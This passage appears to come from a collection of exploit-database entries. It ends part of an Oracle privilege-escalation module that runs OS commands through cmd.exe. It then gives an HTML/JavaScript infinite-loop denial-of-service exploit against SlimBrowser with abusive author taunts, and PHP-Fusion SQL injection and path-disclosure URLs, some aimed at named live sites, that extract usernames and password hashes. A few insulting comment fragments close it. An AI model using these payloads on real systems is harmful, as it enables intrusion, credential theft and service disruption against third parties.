                     "BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;"

          os_code = "select DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','c:\\windows\\system32\\cmd.exe', '/c', ' #{datastore['CMD']}')from dual"

          begin
            print_status("Attempting to grant JAVA IO Privileges")
            prepare_exec(package1)
            prepare_exec(package2)
            prepare_exec(package3)
            print_status("Attempting to execute OS Code")
            prepare_exec(os_code)
          rescue => e
            print_status("Error: #{e.class} #{e}")
          end
        end
      end
  13. <!--
      SlimBrowser v4.12 (Loop) Remote Denial of Service Exploit

      Jumping?? lolz, it's you and your forum kids who got defaced that love jumping. If you still can't do local or patch, come here and I'll teach you. So proud of being invited to join someone else when all you got was an email account, bruakakakaka, hack me if you can biatch!! Hey idiot, you want to pick a fight with me?? Don't hold back, bring your whole family along, I'll take all of you on.

      Tested on Windows XP SP2.

      Author   : v3n0m
      Site     : http://yogyacarderlink.web.id/
      Group    : YOGYACARDERLINK
      Date     : March, 15-2010 [INDONESIA]
      Contact  : v3n0m666[at]live[dot]com
      Software : SlimBrowser
      Download : http://slimbrowser.flashpeak.com/en/dlpage.php
      Greets   : LeQhi,lingah,m4rco,GheMaX,z0mb13,eidelweiss,JaLi-,mywisdom
      ShoutZ   : Yogyakarta City & Jovita
      -->
      <html>
      <title>SlimBrowser v4.12 (Loop) Remote Denial of Service Exploit</title>
      <body>
      <script language="JavaScript1.2" type="text/javascript">
      function MainPageBookmark() {
          title = "0wnage by v3n0m";
          url = "http://www.yogyacarderlink.web.id/";
          if (window.sidebar) {
              window.sidebar.addPanel(title, url, "");
          } else if (window.external) {
              window.external.AddFavorite(url, title);
          } else if (window.opera && window.print) {
              return true;
          }
      }
      // k < k + 1 never becomes false, so the add-favourite dialog is raised without end
      for (k = 0; k < k + 1; k++) MainPageBookmark();
      </script>
      </body>
      </html>
  14. ================================================
      PHP-fusion-6-01-18 (members.php) disclosure ways
      ================================================
      -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
       Inj3ct0r >> Exploit database separated by exploit type (local, remote, DoS, etc.)
      -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
      #[+] Discovered By : Inj3ct0r
      #[+] Site : Inj3ct0r.com
      #[+] support e-mail : submit[at]inj3ct0r.com

      Product: PHP-Fusion
      Version: php-fusion-6-01-18

      Disclosure ways:
      http://[PATH]/members.php?sortby[]=A
      http://[PATH]/messages.php?folder[]=inbox
  15. ===================================================================
      PHP-Fusion <= 6.01.15.4 (downloads.php) SQL Injection Vulnerability
      ===================================================================
      -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
       Inj3ct0r >> Exploit database separated by exploit type (local, remote, DoS, etc.)
      -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
      #[+] Discovered By : Inj3ct0r
      #[+] Site : Inj3ct0r.com
      #[+] support e-mail : submit[at]inj3ct0r.com

      Product: PHP-Fusion
      Version: 6.01.15.4
      Dork : http://www.rus-phpfusion.com/news.php?readmore=32

      Error in file downloads.php
      PHP code:
      $result = dbquery("SELECT * FROM ".$db_prefix."downloads WHERE download_id='$page_id'");
      A vulnerable parameter: $page_id

      Exploit:
      downloads.php?page_id=-1%27+union+select+1,2,user_name,4,user_password,6,7,8,9,10,11,12,13,14,15,16,17+from+rusfusion_users+limit+0,1/*
      Example:
      http://efir-service.com/downloads.php?page_id=-1%27+union+select+1,2,user_name,4,user_password,6,7,8,9,10,11,12,13,14,15,16,17+from+rusfusion_users+limit+0,1/*
      password is encrypted by: md5(md5($pass))
  16. =====================================================
      PHP-Fusion-AP-7.00.2-Rus (search.php) disclosure ways
      =====================================================
      -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
       Inj3ct0r >> Exploit database separated by exploit type (local, remote, DoS, etc.)
      -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
      #[+] Discovered By : Inj3ct0r
      #[+] Site : Inj3ct0r.com
      #[+] support e-mail : submit[at]inj3ct0r.com

      Site: www.alipapa.com.ua
      Product: PHP-Fusion
      Version: PHP-Fusion-AP-7.00.2-Rus

      Disclosure ways.
      Error in file search.php
      PHP code:
      if (isset($_GET['stext'])) {
          if (is_array($_GET['stext'])) {
              redirect(FUSION_SELF);
          } else {
              $_GET['stext'] = urlencode(stripinput($_GET['stext']));
          }
      } else {
          $_GET['stext'] = "";
      }

      Example:
      http://alipapa.com.ua/search.php?stext[]
  17. Caption = "Respect ][ Death Team ][ 2009 ][ " - hackers ), pardon, haxors .. grab everything that is source and hex-edit it.
  18. They have to make a living from something too .. that's why they're commercial .. .
  19. "rpd scanner" wtf? And you're also a 31337 h4x0r .. p.s.: Shoot yourself.